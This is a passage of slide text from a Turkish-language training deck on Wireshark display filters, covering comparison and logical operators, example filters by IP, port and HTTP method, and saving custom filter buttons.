  108. 108. www.prismacsi.com © All Rights Reserved. 10 8 Display Filter
  109. 109. www.prismacsi.com © All Rights Reserved. 10 9 Display Filter
  110. 110. www.prismacsi.com © All Rights Reserved. 11 0 Display Filter
  111. 111. www.prismacsi.com © All Rights Reserved. 11 1 Display Filter • Karşılaştırma operatörleri • eq == Eşittir • ne != Eşit değildir • gt > Büyüktür • lt < Küçüktür • ge >= Büyük eşittir • le <= Küçük eşittir
  112. 112. www.prismacsi.com © All Rights Reserved. 11 2 Display Filter • Örnek • id.dst == 192.168.5.5 # Hedef IP’si 192.168.5.5 ile ilgili paketler • ip.addr==192.168.7.7 # Kaynak ya da hedef IP adresi 192.168.7.7 olan paketleri • tc.port >=0 and tcp.port<=80 # TCP protokolü kullanan 0 ve 80 arasındaki portlar arasındaki paketler • http.request.method==GET # GET method ile gelen http paketleri
  113. 113. www.prismacsi.com © All Rights Reserved. 11 3 Display Filter • Mantıksal Operatörler • and && =(ve) • or || =(veya ) • xor ^^ • not != (değil)
  114. 114. www.prismacsi.com © All Rights Reserved. 11 4 Display Filter • Wireshark’ta kendi filtrelerimizi, filtreleme yaptığımız yerine sağındaki + butonu ile yapabiliriz. • Bu oluşturduğumuz filtrede Expression yanında çıkar. Sık kullandığımız filtreleri bu şekilde kullanabiliriz.
  115. 115. www.prismacsi.com © All Rights Reserved. 11 5 UYGULAMALAR
  116. 116. www.prismacsi.com © All Rights Reserved. 11 6 SORULAR?

×